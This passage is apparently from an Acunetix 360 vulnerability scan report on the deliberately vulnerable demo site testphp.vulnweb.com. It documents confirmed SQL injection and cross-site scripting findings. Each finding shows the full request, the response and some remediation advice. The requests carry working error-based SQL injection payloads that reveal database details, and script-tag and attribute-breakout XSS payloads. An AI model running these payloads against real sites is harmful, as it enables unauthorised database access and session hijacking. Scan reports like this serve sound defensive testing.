GET /listproducts.php?artist=-1%20or%201%3d1%20and%20(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a) HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=2
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 98.7621

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	
Warning: mysql_query(): Unable to save result set in /hj/var/www/listproducts.php on line 67
Error: Duplicate entry '_!@4dilemma:1' for key 'group_key'
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content --
…

4.2. http://testphp.vulnweb.com/listproducts.php?cat=-1%20or%201%3d1%20and%20(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)

CONFIRMED

Method	Parameter	Value
GET	cat	-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHA...

Proof of Exploit

Identified Database Version

5.1.73-0ubuntu0.10.04.1

Identified Database Name

acuart

Identified Database User

acuart@localhost

Request Response Go to the highlighted output

Request

GET /listproducts.php?cat=-1%20or%201%3d1%20and%20(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a) HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 106.9595

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	
Warning: mysql_query(): Unable to save result set in /hj/var/www/listproducts.php on line 61
Error: Duplicate entry '_!@4dilemma:1' for key 'group_key'
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content --
…

4.3. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	uemail
POST	uaddress
POST	ucc
POST	upass2
POST	uuname	-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52...
POST	upass
POST	uphone
POST	urname
POST	signup	signup

Proof of Exploit

Identified Database Version

5.1.73-0ubuntu0.10.04.1

Identified Database Name

acuart

Identified Database User

acuart@localhost

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 362
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

uemail=&uaddress=&ucc=&upass2=&uuname=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&upass=&uphone=&urname=&signup=signup

Response

Response Time (ms) : 415.7118

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 18:31:50 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	Unable to access user database: Duplicate entry '_!@4dilemma:1' for key 'group_key'

Show Remediation Hide Remediation

Actions to Take

See the remedy for solution.
If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
Use your weblogs and application logs to see if there were any previous but undetected attacks to this resource.

Remedy

Required Skills for Successful Exploitation

External References

Remedy References

CLASSIFICATION

HIPAA

CVSS 3.0 SCORE
Base	10 (Critical)
Temporal	10 (Critical)
Environmental	10 (Critical)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 3.1 SCORE
Base	10 (Critical)
Temporal	10 (Critical)
Environmental	10 (Critical)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

5. Cross-site Scripting

HIGH

CONFIRMED

Acunetix 360 detected Cross-site Scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of cross-site scripting, including:

Hijacking user's active session.
Mounting phishing attacks.
Intercepting data and performing man-in-the-middle attacks.

Vulnerabilities

5.1. http://testphp.vulnweb.com/comment.php

CONFIRMED

Method	Parameter	Value
POST	phpaction	echo $_POST[comment];
POST	comment
POST	Submit	Submit
POST	name	</title><scRipt>netsparker(0x007A29)</scRipt>

Request Response Go to the highlighted output

Request

POST /comment.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/comment.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

phpaction=echo+%24_POST%5bcomment%5d%3b&comment=&Submit=Submit&name=%3c%2ftitle%3e%3cscRipt%3enetsparker(0x007A29)%3c%2fscRipt%3e

Response

Response Time (ms) : 1880.1465

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:43:59 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
</title><scRipt>netsparker(0x007A29)</scRipt> commented</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
-->
</style>
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<p class='story'></title><scRipt>netsparker(0x007A29)</scRipt>, thank you for your comment.</p><p class='story'><i></p></i></body>
</html>

5.2. http://testphp.vulnweb.com/guestbook.php

CONFIRMED

Method	Parameter	Value
POST	submit	add message
POST	text	<scRipt>netsparker(0x004CCD)</scRipt>
POST	name	anonymous user

Request Response Go to the highlighted output

Request

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 91
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/guestbook.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

submit=add+message&text=%3cscRipt%3enetsparker(0x004CCD)%3c%2fscRipt%3e&name=anonymous+user

Response

Response Time (ms) : 238.2693

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
ground-color:#F5F5F5"><strong>anonymous user</strong></td><td align="right" style="background-color:#F5F5F5">03.29.1970, 5:18 pm</td></tr><tr><td colspan="2"><img src="/images/remark.gif">&nbsp;&nbsp;<scRipt>netsparker(0x004CCD)</scRipt></td></tr></table>	 </div>
	  <div class="story">
	  	<form action="" method="post" name="faddentry">
			<input type="hidden" name="name" value="test">
			<textarea name="text" rows="5" wrap="VIRTUAL"
…

5.3. http://testphp.vulnweb.com/guestbook.php

CONFIRMED

Method	Parameter	Value
POST	submit	add message
POST	text
POST	name	<scRipt>netsparker(0x004CD3)</scRipt>

Request Response Go to the highlighted output

Request

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 77
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/guestbook.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

submit=add+message&text=&name=%3cscRipt%3enetsparker(0x004CD3)%3c%2fscRipt%3e

Response

Response Time (ms) : 993.602

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
v class="story">
	<table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong><scRipt>netsparker(0x004CD3)</scRipt></strong></td><td align="right" style="background-color:#F5F5F5">03.29.1970, 5:18 pm</td></tr><tr><td colspan="2"><img src="/images/remark.gif">&nbsp;&nbsp;</td></tr></table>	 </div>
	  <div class="st
…

5.4. http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x0067A6)%20x%3d%22

CONFIRMED

Method	Parameter	Value
GET	pp	x" onmouseover=netsparker(0x0067A6) x="

Request Response Go to the highlighted output

Request

GET /hpp/?pp=x%22%20onmouseover%3dnetsparker(0x0067A6)%20x%3d%22 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 2479.7559

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:28:26 GMT

<title>HTTP Parameter Pollution Example</title>

<a href="?pp=12">check</a><br/>
<a href="params.php?p=valid&pp=x%22+onmouseover%3Dnetsparker%280x0067A6%29+x%3D%22">link1</a><br/><a href="params.php?p=valid&pp=x" onmouseover=netsparker(0x0067A6) x="">link2</a><br/><form action="params.php?p=valid&pp=x" onmouseover=netsparker(0x0067A6) x=""><input type=submit name=aaaa/></form><br/>
<hr>
<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>

5.5. http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3cscRipt%3enetsparker(0x007C87)%3c%2fscRipt%3e&pp=12

CONFIRMED

Method	Parameter	Value
GET	p	<scRipt>netsparker(0x007C87)</scRipt>
GET	pp	12
GET	aaaa%2f

Request Response Go to the highlighted output

Request

GET /hpp/params.php?aaaa%2f=&p=%3cscRipt%3enetsparker(0x007C87)%3c%2fscRipt%3e&pp=12 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 286.4462

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:45:23 GMT

<scRipt>netsparker(0x007C87)</scRipt>12

5.6. http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3cscRipt%3enetsparker(0x007C89)%3c%2fscRipt%3e

CONFIRMED

Method	Parameter	Value
GET	p	valid
GET	pp	<scRipt>netsparker(0x007C89)</scRipt>
GET	aaaa%2f

Request Response Go to the highlighted output

Request

GET /hpp/params.php?aaaa%2f=&p=valid&pp=%3cscRipt%3enetsparker(0x007C89)%3c%2fscRipt%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 2011.4007

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:45:31 GMT

valid<scRipt>netsparker(0x007C89)</scRipt>

5.7. http://testphp.vulnweb.com/listproducts.php?artist=%3cscRipt%3enetsparker(0x006E28)%3c%2fscRipt%3e

CONFIRMED

Method	Parameter	Value
GET	artist	<scRipt>netsparker(0x006E28)</scRipt>

Request Response Go to the highlighted output

Request

GET /listproducts.php?artist=%3cscRipt%3enetsparker(0x006E28)%3c%2fscRipt%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 102.1045

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
BeginEditable name="content_rgn" -->
<div id="content">
	Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=<scRipt>netsparker(0x006E28)</scRipt>' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="
…

5.8. http://testphp.vulnweb.com/listproducts.php?cat=%3cscRipt%3enetsparker(0x0049CD)%3c%2fscRipt%3e

CONFIRMED

Method	Parameter	Value
GET	cat	<scRipt>netsparker(0x0049CD)</scRipt>

Request Response Go to the highlighted output

Request

GET /listproducts.php?cat=%3cscRipt%3enetsparker(0x0049CD)%3c%2fscRipt%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 168.78

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
BeginEditable name="content_rgn" -->
<div id="content">
	Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=<scRipt>netsparker(0x0049CD)</scRipt>' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="
…

5.9. http://testphp.vulnweb.com/search.php?test=query

CONFIRMED

Method	Parameter	Value
POST	searchFor	<scRipt>netsparker(0x004281)</scRipt>
POST	goButton	go
POST	test	query

Request Response Go to the highlighted output

Request

POST /search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

searchFor=%3cscRipt%3enetsparker(0x004281)%3c%2fscRipt%3e&goButton=go

Response

Response Time (ms) : 1311.0045

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
="right">
		</td>
	</tr></table>
  </div> 
</div> 
<!-- end masthead --> 

<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	<h2 id='pageName'>searched for: <scRipt>netsparker(0x004281)</scRipt></h2></div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="navBar"> 
  <div id="search"> 
    <form action="search.php?test=query" method="post"> 
      <label>search art</label> 
      <i
…

5.10. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	uemail	invicti@example.com
POST	uaddress	'"--></style></scRipt><scRipt>netsparker(0x006D40)</scRipt>
POST	ucc	4916613944329494
POST	upass2	Inv1@cti
POST	uuname	Smith
POST	upass	Inv1@cti
POST	uphone	3
POST	urname	Smith
POST	signup	signup

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 202
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

uemail=invicti%40example.com&uaddress='"--></style></scRipt><scRipt>netsparker(0x006D40)</scRipt>&ucc=4916613944329494&upass2=Inv1%40cti&uuname=Smith&upass=Inv1%40cti&uphone=3&urname=Smith&signup=signup

Response

Response Time (ms) : 334.0962

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:30:28 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: '"--></style></scRipt><scRipt>netsparker(0x006D40)</scRipt></li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

5.11. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	uemail	'"--></style></scRipt><scRipt>netsparker(0x006D43)</scRipt>
POST	uaddress	3
POST	ucc	4916613944329494
POST	upass2	Inv1@cti
POST	uuname	Smith
POST	upass	Inv1@cti
POST	uphone	3
POST	urname	Smith
POST	signup	signup

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

uemail='"--></style></scRipt><scRipt>netsparker(0x006D43)</scRipt>&uaddress=3&ucc=4916613944329494&upass2=Inv1%40cti&uuname=Smith&upass=Inv1%40cti&uphone=3&urname=Smith&signup=signup

Response

Response Time (ms) : 247.8092

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:30:40 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: '"--></style></scRipt><scRipt>netsparker(0x006D43)</scRipt></li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

5.12. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	uemail	invicti@example.com
POST	uaddress	3
POST	ucc	'"--></style></scRipt><scRipt>netsparker(0x006D46)</scRipt>
POST	upass2	Inv1@cti
POST	uuname	Smith
POST	upass	Inv1@cti
POST	uphone	3
POST	urname	Smith
POST	signup	signup

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

uemail=invicti%40example.com&uaddress=3&ucc='"--></style></scRipt><scRipt>netsparker(0x006D46)</scRipt>&upass2=Inv1%40cti&uuname=Smith&upass=Inv1%40cti&uphone=3&urname=Smith&signup=signup

Response

Response Time (ms) : 552.7262

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:30:51 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: '"--></style></scRipt><scRipt>netsparker(0x006D46)</scRipt></li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

5.13. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	uaddress
POST	uemail
POST	ucc
POST	upass2
POST	uuname	<scRipt>netsparker(0x006DB5)</scRipt>
POST	upass
POST	uphone
POST	urname
POST	signup	signup

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 122
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

uaddress=&uemail=&ucc=&upass2=&uuname=%3cscRipt%3enetsparker(0x006DB5)%3c%2fscRipt%3e&upass=&uphone=&urname=&signup=signup

Response

Response Time (ms) : 252.8438

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:32:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
